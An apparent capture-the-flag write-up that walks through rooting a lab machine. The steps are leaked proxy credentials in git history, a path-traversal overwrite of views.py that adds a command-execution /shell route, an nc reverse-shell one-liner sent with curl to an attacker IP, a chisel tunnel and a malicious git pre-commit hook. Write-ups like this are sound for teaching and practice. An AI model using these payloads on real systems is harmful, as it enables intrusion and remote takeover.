PORT STATE SERVICE 22/tcp open ssh 80/tcp open http 3000/tcp filtered ppp
We’ll be starting with the web server then…
Immediately we’re given an option to “Download the Source Code” which appears to be a docker image, and to test the upload functionality.
There’s a .git so git branch shows us dev and public. Looking thorugh git log dev we can see the commits and when comparing the changes we come across some apparent creds.
"python.pythonPath": "/home/dev01/.virtualenvs/flask-app-b5GscEs_/bin/python", + "http.proxy": "http://dev01:Soulless_Developeremail@example.com:5187/", + "http.proxyStrictSSL": false
Sadly these creds will not work in SSH, so no easy access.
Sadly, it’s not so easy as uploading a PHP reverse shell – The web server is set to serve the file rather than execute it.
While enumerating directories we find an interactive console, locked behind a pin.
While poking around the upload app, I get an error message, we can read this file in its entirety in the source we downloaded.
Essentially, because it’s using os.path.join which, when it take absolute path filenames will ignore the formatting and use the absolute location, we might be able to re-write views.py on the server using Burp and editing the file name.
@app.route('/shell') def cmd(): return os.system(request.args.get('cmd')) curl 'http://10.129.227.140/shell?cmd=rm%20/tmp/f;mkfifo%20/tmp/f;cat%20/tmp/f|/bin/sh%20-i%202>%261|nc%2010.10.14.94%201234%20>/tmp/f'
Adding the following line to views.py allows us to send commands via curl to the server and hopefully, we’ll get a shell…
We’re stuck in the docker container now, but we can have a look at what was running on port 3000 since we’re inside.
#On Kali ./chisel server -p 9999 --reverse #On the box ./chisel client 10.10.14.94:9999 R:3000:172.17.0.1:3000
It’s running Gitea, ExploitDB lists an RCE for this so perhaps we’ll be able to get outside of this container… Let’s see if the Git creds we grabbed earlier work.
So, thankfully dev01 has backed up their home folder which contains an ssh private key…
Last login: Mon May 16 13:13:33 2022 from 10.10.14.23 dev01@opensource:~$ ls user.txt
Now we can log in through SSH and instantly grab the user flag. Time to enumerate.
After a lot of digging around I boot up PsSpy to see what services are running and see Root running a Git Commit to push /home/dev01 to the Gitea server we accessed earlier.
When reading about CVEs for Gitea we learned about Git Hooks and apparently they can just be inserted into the .git/hooks folder, so creating a bash reverse shell script should get us a root shell.
Creating a pre-commit hook should trigger every time the cron job runs
And on our listener we catch a shell. Straight to the root flag and the box is done.